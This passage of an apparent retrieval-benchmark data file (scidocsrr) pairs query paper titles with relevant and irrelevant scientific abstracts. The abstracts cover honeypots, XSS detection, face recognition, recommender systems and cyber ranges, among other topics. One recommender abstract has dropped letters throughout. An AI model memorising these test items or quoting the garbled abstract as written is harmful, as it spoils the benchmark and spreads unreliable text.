"text": "Honeypots are closely monitored decoys that are employed in a network to study the trail of hackers and to alert network administrators of a possible intrusion. Using honeypots provides a cost-effective solution to increase the security posture of an organization. Even though it is not a panacea for security breaches, it is useful as a tool for network forensics and intrusion detection. Nowadays, they are also being extensively used by the research community to study issues in network security, such as Internet worms, spam control, DoS attacks, etc. In this paper, we advocate the use of honeypots as an effective educational tool to study issues in network security. We support this claim by demonstrating a set of projects that we have carried out in a network, which we have deployed specifically for running distributed computer security projects. The design of our projects tackles the challenges in installing a honeypot in academic institution, by not intruding on the campus network while providing secure access to the Internet. In addition to a classification of honeypots, we present a framework for designing assignments/projects for network security courses. The three sample honeypot projects discussed in this paper are presented as examples of the framework.",
"title": ""
},
{
"docid": "102077708fb1623c44c3b23d02387dd4",
"text": "Machine leaning apps require heavy computations, especially with the use of the deep neural network (DNN), so an embedded device with limited hardware cannot run the apps by itself. One solution for this problem is to offload DNN computations from the client to a nearby edge server. Existing approaches to DNN offloading with edge servers either specialize the edge server for fixed, specific apps, or customize the edge server for diverse apps, yet after migrating a large VM image that contains the client's back-end software system. In this paper, we propose a new and simple approach to offload DNN computations in the context of web apps. We migrate the current execution state of a web app from the client to the edge server just before executing a DNN computation, so that the edge server can execute the DNN computation with its powerful hardware. Then, we migrate the new execution state from the edge server to the client so that the client can continue to execute the app. We can save the execution state of the web app in the form of another web app called the snapshot, which immensely simplifies saving and restoring the execution state with a small overhead. We can offload any DNN app to any generic edge server, equipped with a browser and our offloading system. We address some issues related to offloading DNN apps such as how to send the DNN model and how to improve the privacy of user data. We also discuss how to install our offloading system on the edge server on demand. Our experiment with real DNN-based web apps shows that snapshot-based offloading achieves a promising performance result, comparable to running the app entirely on the server.",
"title": ""
},
{
"docid": "a4575294abe94aec3ae03451fc96f854",
"text": "Short-term traffic forecasting based on deep learning methods, especially long-term short memory (LSTM) neural networks, received much attention in recent years. However, the potential of deep learning methods is far from being fully exploited in terms of the depth of the architecture, the spatial scale of the prediction area, and the prediction power of spatial-temporal data. In this paper, a deep stacked bidirectional and unidirectional LSTM (SBU-LSTM) neural network is proposed, which considers both forward and backward dependencies of time series data, to predict the networkwide traffic speed. A bidirectional LSTM (BDLSM) layer is exploited to capture spatial features and bidirectional temporal dependencies from historical data. To the best of our knowledge, this is the first time that BDLSTM is applied as building blocks for a deep architecture model to measure the backward dependency of traffic data for prediction. A comparison with other classical and state-of-the-art models indicates that the proposed SBU-LSTM neural network achieves superior prediction performance for the whole traffic network in both accuracy and robustness.",
"title": ""
},
{
"docid": "51cdea34f0bf97e6f901f560c607b89c",
"text": "Many state-of-the-art automatic speech recognition (ASR) systems adopt system combination techniques to improve recognition performance. In this paper, we investigate the possibility of transferring knowledge between models for different noisy speech domains and integrating these models via system combination. The first contribution of our work is the use of progressive neural networks for modeling the acoustic features of noisy speech. We train progressive neural networks on subdivided noisy data to achieve knowledge transfer between different noise conditions. Our second contribution is an improved multi-stream WFST framework that combines the output of the progressive networks at longer timescales (e.g., word hypotheses). The score fusion is performed by a trained LSTM at the word boundary on the decoding lattice. By adopting both knowledge transfer and system combination techniques, we achieve improved performance compared with independently trained deep neural networks.",
"title": ""
},
{
"docid": "230eeb3f19545befa245f7608378cb6d",
"text": "Most web programs are vulnerable to cross site scripting (XSS) that can be exploited by injecting JavaScript code. Unfortunately, injected JavaScript code is difficult to distinguish from the legitimate code at the client side. Given that, server side detection of injected JavaScript code can be a layer of defense. Existing server side approaches rely on identifying legitimate script code, and an attacker can circumvent the technique by injecting legitimate JavaScript code. Moreover, these approaches assume that no JavaScript code is downloaded from third party websites. To address these limitations, we develop a server side approach that distinguishes injected JavaScript code from legitimate JavaScript code. Our approach is based on the concept of injecting comment statements containing random tokens and features of legitimate JavaScript code. When a response page is generated, JavaScript code without or incorrect comment is considered as injected code. Moreover, the valid comments are checked for duplicity. Any presence of duplicate comments or a mismatch between expected code features and actually observed features represents JavaScript code as injected. We implement a prototype tool that automatically injects JavaScript comments and deploy injected JavaScript code detector as a server side filter. We evaluate our approach with three JSP programs. The evaluation results indicate that our approach detects a wide range of code injection attacks.",
"title": ""
}
] | scidocsrr |
b5fa56f1b9e0584dfaff0f990b9842c5 | A fast face clustering method for indexing applications on mobile phones | [
{
"docid": "5cf71fc03658cd7210ac2a764f1425d7",
"text": "Most existing pose robust methods are too computational complex to meet practical applications and their performance under unconstrained environments are rarely evaluated. In this paper, we propose a novel method for pose robust face recognition towards practical applications, which is fast, pose robust and can work well under unconstrained environments. Firstly, a 3D deformable model is built and a fast 3D model fitting algorithm is proposed to estimate the pose of face image. Secondly, a group of Gabor filters are transformed according to the pose and shape of face image for feature extraction. Finally, PCA is applied on the pose adaptive Gabor features to remove the redundances and Cosine metric is used to evaluate the similarity. The proposed method has three advantages: (1) The pose correction is applied in the filter space rather than image space, which makes our method less affected by the precision of the 3D model, (2) By combining the holistic pose transformation and local Gabor filtering, the final feature is robust to pose and other negative factors in face recognition, (3) The 3D structure and facial symmetry are successfully used to deal with self-occlusion. Extensive experiments on FERET and PIE show the proposed method outperforms state-of-the-art methods significantly, meanwhile, the method works well on LFW.",
"title": ""
}
] | [
{
"docid": "b89f17fc46b9515b6fd6e7223335bedd",
"text": "Systems for automati ally re ommending items (e.g., movies, produ ts, or information) to users are be oming in reasingly important in eommer e appli ations, digital libraries, and other domains where mass personalization is highly valued. Su h re ommender systems typi ally base their suggestions on (1) ollaborative data en oding whi h users like whi h items, and/or (2) ontent data des ribing item features and user demographi s. Systems that rely solely on ollaborative data fail when operating from a old start|that is, when re ommending items (e.g., rst-run movies) that no member of the ommunity has yet seen. We develop several generative probabilisti models that ir umvent the old-start problem by mixing ontent data with ollaborative data in a sound statisti al manner. We evaluate the algorithms using MovieLens movie ratings data, augmented with a tor and dire tor information from the Internet Movie Database. We nd that maximum likelihood learning with the expe tation maximization (EM) algorithm and variants tends to over t omplex models that are initialized randomly. However, by seeding parameters of the omplex models with parameters learned in simpler models, we obtain greatly improved performan e. We explore both methods that exploit a single type of ontent data (e.g., a tors only) and methods that leverage multiple types of ontent data (e.g., both a tors and dire tors) simultaneously.",
"title": ""
},
{
"docid": "42154a643aea1be4c0f531306a98bcee",
"text": "With Grand Theft Education: Literacy in the Age of Video Games gracing the cover of Harper’s September 2006 magazine, video games and education, once the quirky interest of a few rogue educational technologists and literacy scholars, reached broader public awareness. The idea of combining video games and education is not new; twenty years ago, Ronald Reagan praised video games for their potential to train “a new generation of warriors.” Meanwhile, Surgeon General C. Everett Koop declared video games among the top health risks facing Americans.1 Video games, like any emerging medium, are disruptive, challenging existing social practices, while capturing our dreams and triggering our fears. Today’s gaming technologies, which allow for unprecedented player exploration and expression, suggest new models of what educational gaming can be.2 As educational games leave the realm of abstraction and become a reality, the field needs to move beyond rhetoric and toward grounded examples not just of good educational games, but effective game-based learning environments that leverage the critical aspects of the medium as they apply to the needs of a twenty-first-century educational system. We need rigorous research into what players do with games (particularly those that don’t claim explicit status as educational), and a better understanding of the thinking that is involved in playing them.3 We need precise language for what we mean by “video games,” and better understandings of how specific design features and patterns operate,4 and compelling evidence of game-based learning environments. In short, the study of games and learning is ready to come of age. Researchers have convinced the academy that games are worthy of study, and that games hold potential for learning. The task now is to provide effective models of how they operate.5 This chapter offers a theoretical model for video game-based learning environments as designed experiences. To be more specific, it suggests that we can take one particular type of video game—open-ended simulation, or “sandbox” games—and use its capacity to recruit diverse interests, creative problem solving, and productive acts (e.g., creating artwork, game",
"title": ""
},
{
"docid": "483e6da76a41038b3d1a6e97fb02fea4",
"text": "Unhealthy use of the Internet and mobile phones is a health issue in Japan. We solicited participation in this questionnaire-based study from the employees of a city office in Kumamoto. A total of 92 men and 54 women filled in the Internet Addiction Questionnaire (IAQ), the Self-perception of Text-message Dependency Scale (STDS), and the Hospital Anxiety and Depression Scale (HADS). The prevalence of ‘‘light Internet addiction’’ and ‘‘severe Internet addiction’’ were 33.7% and 6.1% for men whereas they were 24.6% and 1.8% for women. The prevalence of ‘‘light mobile phone text-message addiction’’ was 3.1% for men and 5.4% for women. There were no cases of ‘‘sever text-message addiction’’. We found a two-factor structure for the IAQ and a three-factor structure for the STDS. We also performed an EFA of the IAQ and STDS subscales, and this revealed a two-factor structure – Internet Dependency and Text-message Dependency. An STDS subscale, Relationship Maintenance, showed a moderate factor loading of the factor that reflected unhealthy Internet use. In a path analysis, Depression was associated with both Internet Dependency and Text-message Dependency whereas Anxiety was associated negatively with Text-message Dependency. These results suggest applicability of the IAQ and STDS and that Internet and Text-message Dependences are factorially distinct. 2011 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "28d75588fdb4ff45929da124b001e8cc",
"text": "We present a novel training framework for neural sequence models, particularly for grounded dialog generation. The standard training paradigm for these models is maximum likelihood estimation (MLE), or minimizing the cross-entropy of the human responses. Across a variety of domains, a recurring problem with MLE trained generative neural dialog models (G) is that they tend to produce ‘safe’ and generic responses (‘I don’t know’, ‘I can’t tell’). In contrast, discriminative dialog models (D) that are trained to rank a list of candidate human responses outperform their generative counterparts; in terms of automatic metrics, diversity, and informativeness of the responses. However, D is not useful in practice since it can not be deployed to have real conversations with users. Our work aims to achieve the best of both worlds – the practical usefulness of G and the strong performance of D – via knowledge transfer from D to G. Our primary contribution is an end-to-end trainable generative visual dialog model, where G receives gradients from D as a perceptual (not adversarial) loss of the sequence sampled from G. We leverage the recently proposed Gumbel-Softmax (GS) approximation to the discrete distribution – specifically, a RNN augmented with a sequence of GS samplers, coupled with the straight-through gradient estimator to enable end-to-end differentiability. We also introduce a stronger encoder for visual dialog, and employ a self-attention mechanism for answer encoding along with a metric learning loss to aid D in better capturing semantic similarities in answer responses. Overall, our proposed model outperforms state-of-the-art on the VisDial dataset by a significant margin (2.67% on recall@10). The source code can be downloaded from https://github.com/jiasenlu/visDial.pytorch",
"title": ""
},
{
"docid": "26d9a51b9312af2b63d2e2876c9d448e",
"text": "Permission has been given to destroy this document when it is no longer needed. Cyber-enabled and cyber-physical systems connect and engage virtually every mission-critical military capability today. And as more warfighting technologies become integrated and connected, both the risks and opportunities from a cyberwarfare continue to grow—motivating sweeping requirements and investments in cybersecurity assessment capabilities to evaluate technology vulner-abilities, operational impacts, and operator effectiveness. Operational testing of cyber capabilities, often in conjunction with major military exercises, provides valuable connections to and feedback from the operational warfighter community. These connections can help validate capability impact on the mission and, when necessary, provide course-correcting feedback to the technology development process and its stakeholders. However, these tests are often constrained in scope, duration, and resources and require a thorough and wholistic approach, especially with respect to cyber technology assessments, where additional safety and security constraints are often levied. This report presents a summary of the state of the art in cyber assessment technologies and methodologies and prescribes an approach to the employment of cyber range operational exercises (OPEXs). Numerous recommendations on general cyber assessment methodologies and cyber range design are included, the most significant of which are summarized below. • Perform bottom-up and top-down assessment formulation methodologies to robustly link mission and assessment objectives to metrics, success criteria, and system observables. • Include threat-based assessment formulation methodologies that define risk and security met-rics within the context of mission-relevant adversarial threats and mission-critical system assets. • Follow a set of cyber range design mantras to guide and grade the design of cyber range components. • Call for future work in live-to-virtual exercise integration and cross-domain modeling and simulation technologies. • Call for continued integration of developmental and operational cyber assessment events, development of reusable cyber assessment test tools and processes, and integration of a threat-based assessment approach across the cyber technology acquisition cycle. Finally, this recommendations report was driven by obsevations made by the MIT Lincoln Laboratory (MIT LL) Cyber Measurement Campaign (CMC) team during an operational demonstration event for the DoD Enterprise Cyber Range Environment (DECRE) Command and Control Information Systems (C2IS). 1 This report also incorporates a prior CMC report based on Pacific Command (PACOM) exercise observations, as well as MIT LL's expertise in cyber range development and cyber systems assessment. 2 1 CMC is explained in further detail in Appendix A.1. 2 See References section at the end of the report. …",
"title": ""
},
{
"docid": "392c2499a8d9c0ec2bf329ab92d6ace3",
"text": "OBJECTIVE\nCurrent state-of-the-art artificial pancreas systems are either based on traditional linear control theory or rely on mathematical models of glucose-insulin dynamics. Blood glucose control using these methods is limited due to the complexity of the biological system. The aim of this study was to describe the principles and clinical performance of the novel MD-Logic Artificial Pancreas (MDLAP) System.\n\n\nRESEARCH DESIGN AND METHODS\nThe MDLAP applies fuzzy logic theory to imitate lines of reasoning of diabetes caregivers. It uses a combination of control-to-range and control-to-target strategies to automatically regulate individual glucose levels. Feasibility clinical studies were conducted in seven adults with type 1 diabetes (aged 19-30 years, mean diabetes duration 10 +/- 4 years, mean A1C 6.6 +/- 0.7%). All underwent 14 full, closed-loop control sessions of 8 h (fasting and meal challenge conditions) and 24 h.\n\n\nRESULTS\nThe mean peak postprandial (overall sessions) glucose level was 224 +/- 22 mg/dl. Postprandial glucose levels returned to <180 mg/dl within 2.6 +/- 0.6 h and remained stable in the normal range for at least 1 h. During 24-h closed-loop control, 73% of the sensor values ranged between 70 and 180 mg/dl, 27% were >180 mg/dl, and none were <70 mg/dl. There were no events of symptomatic hypoglycemia during any of the trials.\n\n\nCONCLUSIONS\nThe MDLAP system is a promising tool for individualized glucose control in patients with type 1 diabetes. It is designed to minimize high glucose peaks while preventing hypoglycemia. Further studies are planned in the broad population under daily-life conditions.",
"title": ""
},
{
"docid": "cc3eac062ecd9953796b43425ede0663",
"text": "The ElGamal encryption scheme has been proposed several years ago and is one of the few probabilistic encryption schemes. However, its security has never been concretely proven based on clearly understood and accepted primitives. Here we show directly that the decision Diffie-Hellman assumption implies the security of the original ElGamal encryption scheme (with messages from a subgroup) without modification. In addition, we show that the opposite direction holds, i.e., the semantic security of the ElGamal encryption is actually equivalent to the decision Diffie-Hellman problem. We also present an exact analysis of the efficiency of the reduction. Next we present additions on ElGamal encryption which result in nonmalleability under adaptive chosen plaintext attacks. Non-malleability is equivalent to the decision Diffie-Hellman assumption, the existence of a random oracle (in practice a secure hash function) or a trusted beacon (as needed for the Fiat-Shamir argument), and one assumption about the unforgeability of Schnorr signatures. Our proof employs the tool of message awareness.",
"title": ""
},
{
"docid": "aec38c33e2dce7165b7d148982082509",
"text": "Predicting the success or failure of a student in a course or program is a problem that has recently been addressed using data mining techniques. In this paper we evaluate some of the most popular classification and regression algorithms on this problem. We address two problems: prediction of approval/failure and prediction of grade. The former is tackled as a classification task while the latter as a regression task. Separate models are trained for each course. The experiments were carried out using administrate data from the University of Porto, concerning approximately 700 courses. The algorithms with best results overall in classification were decision trees and SVM while in regression they were SVM, Random Forest, and AdaBoost.R2. However, in the classification setting, the algorithms are finding useful patterns, while, in regression, the models obtained are not able to beat a simple baseline.",
"title": ""
},
{
"docid": "7c5f2c92cb3d239674f105a618de99e0",
"text": "We consider the isolated spelling error correction problem as a specific subproblem of the more general string-to-string translation problem. In this context, we investigate four general string-to-string transformation models that have been suggested in recent years and apply them within the spelling error correction paradigm. In particular, we investigate how a simple ‘k-best decoding plus dictionary lookup’ strategy performs in this context and find that such an approach can significantly outdo baselines such as edit distance, weighted edit distance, and the noisy channel Brill and Moore model to spelling error correction. We also consider elementary combination techniques for our models such as language model weighted majority voting and center string combination. Finally, we consider real-world OCR post-correction for a dataset sampled from medieval Latin texts.",
"title": ""
},
{
"docid": "1a59bf4467e73a6cae050e5670dbf4fa",
"text": "BACKGROUND\nNivolumab combined with ipilimumab resulted in longer progression-free survival and a higher objective response rate than ipilimumab alone in a phase 3 trial involving patients with advanced melanoma. We now report 3-year overall survival outcomes in this trial.\n\n\nMETHODS\nWe randomly assigned, in a 1:1:1 ratio, patients with previously untreated advanced melanoma to receive nivolumab at a dose of 1 mg per kilogram of body weight plus ipilimumab at a dose of 3 mg per kilogram every 3 weeks for four doses, followed by nivolumab at a dose of 3 mg per kilogram every 2 weeks; nivolumab at a dose of 3 mg per kilogram every 2 weeks plus placebo; or ipilimumab at a dose of 3 mg per kilogram every 3 weeks for four doses plus placebo, until progression, the occurrence of unacceptable toxic effects, or withdrawal of consent. Randomization was stratified according to programmed death ligand 1 (PD-L1) status, BRAF mutation status, and metastasis stage. The two primary end points were progression-free survival and overall survival in the nivolumab-plus-ipilimumab group and in the nivolumab group versus the ipilimumab group.\n\n\nRESULTS\nAt a minimum follow-up of 36 months, the median overall survival had not been reached in the nivolumab-plus-ipilimumab group and was 37.6 months in the nivolumab group, as compared with 19.9 months in the ipilimumab group (hazard ratio for death with nivolumab plus ipilimumab vs. ipilimumab, 0.55 [P<0.001]; hazard ratio for death with nivolumab vs. ipilimumab, 0.65 [P<0.001]). The overall survival rate at 3 years was 58% in the nivolumab-plus-ipilimumab group and 52% in the nivolumab group, as compared with 34% in the ipilimumab group. The safety profile was unchanged from the initial report. Treatment-related adverse events of grade 3 or 4 occurred in 59% of the patients in the nivolumab-plus-ipilimumab group, in 21% of those in the nivolumab group, and in 28% of those in the ipilimumab group.\n\n\nCONCLUSIONS\nAmong patients with advanced melanoma, significantly longer overall survival occurred with combination therapy with nivolumab plus ipilimumab or with nivolumab alone than with ipilimumab alone. (Funded by Bristol-Myers Squibb and others; CheckMate 067 ClinicalTrials.gov number, NCT01844505 .).",
"title": ""
},
{
"docid": "3141caaf2d19070e46e66b7a219c131e",
"text": "The sudden inability to walk is one of the most glaring impairments following spinal cord injury (SCI). Regardless of time since injury, recovery of walking has been found to be one of the top priorities for those with SCI as well as their rehabilitation professionals [1]. Despite clinical management and promising basic science research advances, a recent multicenter prospective study revealed that 59% of those with SCI are unable to ambulate without assistance from others at one year following injury [2]. The worldwide incidence of SCI is between 10.4-83 per million [3], and there are approximately 265,000 persons with SCI living in the United States [4]. Thus, there is a tremendous consumer demand to improve ambulation outcomes following SCI.",
"title": ""
},
{
"docid": "52b9fdd4601e8a084346721bea3b824e",
"text": "Detecting road potholes and road roughness levels is key to road condition monitoring, which impacts transport safety and driving comfort. We propose a crowd sourcing based road surface monitoring system, simply called CRSM. CRSM can effectively detect road potholes and evaluate road roughness levels using our hardware modules mounted on distributed vehicles. These modules use low-end accelerometers and GPS devices to obtain vibration pattern, location, and vehicle velocity. Considering the high cost of onboard storage and wireless transmission, a novel light-weight data mining algorithm is proposed to detect road surface events and transmit potential pothole information to a central server. The server gathers reports from the multiple vehicles, and makes a comprehensive evaluation on road surface quality. We have implemented a product-quality system and deployed it on 100 taxies in the Shenzhen urban area. The results show that CRSM can detect road potholes with up to 90% accuracy, and nearly zero false alarms. CRSM can also evaluate road roughness levels correctly, even with some interferences from small bumps or potholes.",
"title": ""
},
{
"docid": "0e5a7bc9022e47a6616a018fd7637832",
"text": "In this paper, we present the design and implementation of Beehive, a distributed control platform with a simple programming model. In Beehive, control applications are centralized asynchronous message handlers that optionally store their state in dictionaries. Beehive's control platform automatically infers the keys required to process a message, and guarantees that each key is only handled by one light-weight thread of execution (i.e., bee) among all controllers (i.e., hives) in the platform. With that, Beehive transforms a centralized application into a distributed system, while preserving the application's intended behavior. Beehive replicates the dictionaries of control applications consistently through mini-quorums (i.e., colonies), instruments applications at runtime, and dynamically changes the placement of control applications (i.e., live migrates bees) to optimize the control plane. Our implementation of Beehive is open source, high-throughput and capable of fast failovers. We have implemented an SDN controller on top of Beehive that can handle 200K of OpenFlow messages per machine, while persisting and replicating the state of control applications. We also demonstrate that, not only can Beehive tolerate faults, but also it is capable of optimizing control applications after a failure or a change in the workload.",
"title": ""
},
{
"docid": "433340f3392257a8ac830215bf5e3ef2",
"text": "A compact Substrate Integrated Waveguide (SIW) Leaky-Wave Antenna (LWA) is proposed. Internal vias are inserted in the SIW in order to have narrow walls, and so reducing the size of the SIW-LWA, the new structure is called Slow Wave - Substrate Integrated Waveguide - Leaky Wave Antenna (SW-SIW-LWA), since inserting the vias induce the SW effect. After designing the antenna and simulating with HFSS a reduction of 30% of the transverse side of the antenna is attained while maintaining an acceptable gain. Other parameters like the radiation efficiency, Gain, directivity, and radiation pattern are analyzed. Finally a Comparison of our miniaturization technique with Half-Mode Substrate Integrated Waveguide (HMSIW) technique realized in recent articles is done, shows that SW-SIW-LWA technique could be a good candidate for SIW miniaturization.",
"title": ""
},
{
"docid": "02d441c58e7757a4c2f428064dfa756c",
"text": "The prevalence of disordered eating and eating disorders vary from 0-19% in male athletes and 6-45% in female athletes. The objective of this paper is to present an overview of eating disorders in adolescent and adult athletes including: (1) prevalence data; (2) suggested sport- and gender-specific risk factors and (3) importance of early detection, management and prevention of eating disorders. Additionally, this paper presents suggestions for future research which includes: (1) the need for knowledge regarding possible gender-specific risk factors and sport- and gender-specific prevention programmes for eating disorders in sports; (2) suggestions for long-term follow-up for female and male athletes with eating disorders and (3) exploration of a possible male athlete triad.",
"title": ""
},
{
"docid": "83cd04900b09258aa975f44dc2e3649d",
"text": "The transition stage from the natural cognitive decline of normal aging to the more serious decline of dementia is referred to as mild cognitive impairment (MCI). The cognitive changes caused in MCI are noticeable by the individuals experiencing them and by others, but the changes are not severe enough to interfere with daily life or with independent activities. Because there is a thin line between normal aging and MCI, it is difficult for individuals to discern between the two conditions. Moreover, if the symptoms of MCI are not diagnosed in time, it may lead to more serious and permanent conditions. However, if these symptoms are detected in time and proper care and precaution are taken, it is possible to prevent the condition from worsening. A smart-home environment that unobtrusively keeps track of the individual's daily living activities is a possible solution to improve care and quality of life.",
"title": ""
},
{
"docid": "573f12acd3193045104c7d95bbc89f78",
"text": "Automatic Face Recognition is one of the most emphasizing dilemmas in diverse of potential relevance like in different surveillance systems, security systems, authentication or verification of individual like criminals etc. Adjoining of dynamic expression in face causes a broad range of discrepancies in recognition systems. Facial Expression not only exposes the sensation or passion of any person but can also be used to judge his/her mental views and psychosomatic aspects. This paper is based on a complete survey of face recognition conducted under varying facial expressions. In order to analyze different techniques, motion-based, model-based and muscles-based approaches have been used in order to handle the facial expression and recognition catastrophe. The analysis has been completed by evaluating various existing algorithms while comparing their results in general. It also expands the scope for other researchers for answering the question of effectively dealing with such problems.",
"title": ""
},
{
"docid": "9718921e6546abd13e8f08698ba10423",
"text": "LawStats provides quantitative insights into court decisions from the Bundesgerichtshof – Federal Court of Justice (BGH), the Federal Court of Justice in Germany. Using Watson Web Services and approaches from Sentiment Analysis (SA), we can automatically classify the revision outcome and offer statistics on judges, senates, previous instances etc. via faceted search. These statistics are accessible through a open web interface to aid law professionals. With a clear focus on interpretability, users can not only explore statistics, but can also understand, which sentences in the decision are responsible for the machine’s decision; links to the original texts provide more context. This is the first largescale application of Machine Learning (ML) based Natural Language Processing (NLP) for German in the analysis of ordinary court decisions in Germany that we are aware of. We have analyzed over 50,000 court decisions and extracted the outcomes and relevant entities. The modular architecture of the application allows continuous improvements of the ML model as more annotations become available over time. The tool can provide a critical foundation for further quantitative research in the legal domain and can be used as a proof-of-concept for similar efforts.",
"title": ""
},
{
"docid": "ab71df85da9c1798a88b2bb3572bf24f",
"text": "In order to develop an efficient and reliable pulsed power supply for excimer dielectric barrier discharge (DBD) ultraviolet (UV) sources, a pulse generator using Marx topology is adopted. MOSFETs are used as switches. The 12-stage pulse generator operates with a voltage amplitude in the range of 0-5.5 kV. The repetition rate and pulsewidth can be adjusted from 0.1 to 50 kHz and 2 to 20 μs, respectively. It is used to excite KrCl* excilamp, a typical DBD UV source. In order to evaluate the performance of the pulse generator, a sinusoidal voltage power supply dedicated for DBD lamp is also used to excite the KrCl* excilamp. It shows that the lamp excited by the pulse generator has better performance with regard to radiant power and system efficiency. The influence of voltage amplitude, repetition rate, pulsewidth, and rise and fall times on radiant power and system efficiency is investigated using the pulse generator. An inductor is inserted between the pulse generator and the KrCl* excilamp to reduce electromagnetic interference and enhance system reliability.",
"title": ""
},
{
"docid": "b38b1dd4a087c23ff5d152a791dd1b41",
"text": "Absfruct-This paper discusses an approximate solution to the weighted graph matching prohlem (WGMP) for both undirected and directed graphs. The W G M P is the problem of f inding the opt imum matching between two weighted graphs, which are graphs with weights at each arc. The proposed method employs an analytic, instead of a combinatorial or iterative, approach to the opt imum matching problem of such graphs. By using the eigendecomposit ions of the adjacency matrices (in the case of the undirected graph matching problem) or some Hermitian matrices derived from the adjacency matrices (in the case of the directed graph matching problem), a matching close to the opt imum one can be found efficiently when the graphs are sufficiently close to each other. Simulation experiments are also given to evaluate the performance of the proposed method.",
"title": ""
}
] | scidocsrr |
b27d6d9e2b150e05e6aae7522b66b5b4 | Transfiguring portraits | [
{
"docid": "57ccc061377399b669d5ece668b7e030",
"text": "We present a method for the real-time transfer of facial expressions from an actor in a source video to an actor in a target video, thus enabling the ad-hoc control of the facial expressions of the target actor. The novelty of our approach lies in the transfer and photorealistic re-rendering of facial deformations and detail into the target video in a way that the newly-synthesized expressions are virtually indistinguishable from a real video. To achieve this, we accurately capture the facial performances of the source and target subjects in real-time using a commodity RGB-D sensor. For each frame, we jointly fit a parametric model for identity, expression, and skin reflectance to the input color and depth data, and also reconstruct the scene lighting. For expression transfer, we compute the difference between the source and target expressions in parameter space, and modify the target parameters to match the source expressions. A major challenge is the convincing re-rendering of the synthesized target face into the corresponding video stream. This requires a careful consideration of the lighting and shading design, which both must correspond to the real-world environment. We demonstrate our method in a live setup, where we modify a video conference feed such that the facial expressions of a different person (e.g., translator) are matched in real-time.",
"title": ""
},
{
"docid": "e7a0a9e31bba0eec8bf598c5e9eefe6b",
"text": "Stylizing photos, to give them an antique or artistic look, has become popular in recent years. The available stylization filters, however, are usually created manually by artists, resulting in a narrow set of choices. Moreover, it can be difficult for the user to select a desired filter, since the filters’ names often do not convey their functions. We investigate an approach to photo filtering in which the user provides one or more keywords, and the desired style is defined by the set of images returned by searching the web for those keywords. Our method clusters the returned images, allows the user to select a cluster, then stylizes the user’s photos by transferring vignetting, color, and local contrast from that cluster. This approach vastly expands the range of available styles, and gives each filter a meaningful name by default. We demonstrate that our method is able to robustly transfer a wide range of styles from image collections to users’ photos.",
"title": ""
},
{
"docid": "225204d66c371372debb3bb2a37c795b",
"text": "We present two novel methods for face verification. Our first method - “attribute” classifiers - uses binary classifiers trained to recognize the presence or absence of describable aspects of visual appearance (e.g., gender, race, and age). Our second method - “simile” classifiers - removes the manual labeling required for attribute classification and instead learns the similarity of faces, or regions of faces, to specific reference people. Neither method requires costly, often brittle, alignment between image pairs; yet, both methods produce compact visual descriptions, and work on real-world images. Furthermore, both the attribute and simile classifiers improve on the current state-of-the-art for the LFW data set, reducing the error rates compared to the current best by 23.92% and 26.34%, respectively, and 31.68% when combined. For further testing across pose, illumination, and expression, we introduce a new data set - termed PubFig - of real-world images of public figures (celebrities and politicians) acquired from the internet. This data set is both larger (60,000 images) and deeper (300 images per individual) than existing data sets of its kind. Finally, we present an evaluation of human performance.",
"title": ""
},
{
"docid": "ca8010546d4e9ae495de8f9fecb85a43",
"text": "We study the problem of matching photos of a person to paintings of that person, in order to retrieve similar paintings given a query photo. This is challenging as paintings span many media (oil, ink, watercolor) and can vary tremendously in style (caricature, pop art, minimalist). We make the following contributions: (i) we show that, depending on the face representation used, performance can be improved substantially by learning – either by a linear projection matrix common across identities, or by a per-identity classifier. We compare Fisher Vector and Convolutional Neural Network representations for this task; (ii) we introduce new datasets for learning and evaluating this problem; (iii) we also consider the reverse problem of retrieving photos from a large corpus given a painting; and finally, (iv) using the learnt descriptors, we show that, given a photo of a person, we are able to find their doppelgänger in a large dataset of oil paintings, and how this result can be varied by modifying attributes (e.g. frowning, old looking).",
"title": ""
}
] | [
{
"docid": "c475f6a9868cdef2de8ee691b5fce00d",
"text": "Deep networks have recently been shown to be vulnerable to universal perturbations: there exist very small image-agnostic perturbations that cause most natural images to be misclassified by such classifiers. In this paper, we propose a quantitative analysis of the robustness of classifiers to universal perturbations, and draw a formal link between the robustness to universal perturbations, and the geometry of the decision boundary. Specifically, we establish theoretical bounds on the robustness of classifiers under two decision boundary models (flat and curved models). We show in particular that the robustness of deep networks to universal perturbations is driven by a key property of their curvature: there exists shared directions along which the decision boundary of deep networks is systematically positively curved. Under such conditions, we prove the existence of small universal perturbations. Our analysis further provides a novel geometric method for computing universal perturbations, in addition to explaining their properties.",
"title": ""
},
{
"docid": "3bba773dc33ef83b975dd15803fac957",
"text": "In competitive games where players' skill levels are mis-matched, the play experience can be unsatisfying for both stronger and weaker players. Player balancing provides assistance for less-skilled players in order to make games more competitive and engaging. Although player balancing can be seen in many real-world games, there is little work on the design and effectiveness of these techniques outside of shooting games. In this paper we provide new knowledge about player balancing in the popular and competitive rac-ing genre. We studied issues of noticeability and balancing effectiveness in a prototype racing game, and tested the effects of several balancing techniques on performance and play experience. The techniques significantly improved the balance of player performance, were preferred by both experts and novices, increased novices' feelings of competi-tiveness, and did not detract from experts' experience. Our results provide new understanding of the design and use of player balancing for racing games, and provide novel tech-niques that can also be applied to other genres.",
"title": ""
},
{
"docid": "97e33cc9da9cb944c27d93bb4c09ef3d",
"text": "Synchrophasor devices guarantee situation awareness for real-time monitoring and operational visibility of the smart grid. With their widespread implementation, significant challenges have emerged, especially in communication, data quality and cybersecurity. The existing literature treats these challenges as separate problems, when in reality, they have a complex interplay. This paper conducts a comprehensive review of quality and cybersecurity challenges for synchrophasors, and identifies the interdependencies between them. It also summarizes different methods used to evaluate the dependency and surveys how quality checking methods can be used to detect potential cyberattacks. In doing so, this paper serves as a starting point for researchers entering the fields of synchrophasor data analytics and security.",
"title": ""
},
{
"docid": "f1af321a5d7c2e738c181373d5dbfc9a",
"text": "This research examined how motivation (perceived control, intrinsic motivation, and extrinsic motivation), cognitive learning strategies (deep and surface strategies), and intelligence jointly predict long-term growth in students' mathematics achievement over 5 years. Using longitudinal data from six annual waves (Grades 5 through 10; Mage = 11.7 years at baseline; N = 3,530), latent growth curve modeling was employed to analyze growth in achievement. Results showed that the initial level of achievement was strongly related to intelligence, with motivation and cognitive strategies explaining additional variance. In contrast, intelligence had no relation with the growth of achievement over years, whereas motivation and learning strategies were predictors of growth. These findings highlight the importance of motivation and learning strategies in facilitating adolescents' development of mathematical competencies.",
"title": ""
},
{
"docid": "4f60b7c7483ec68804caa3ccdd488c50",
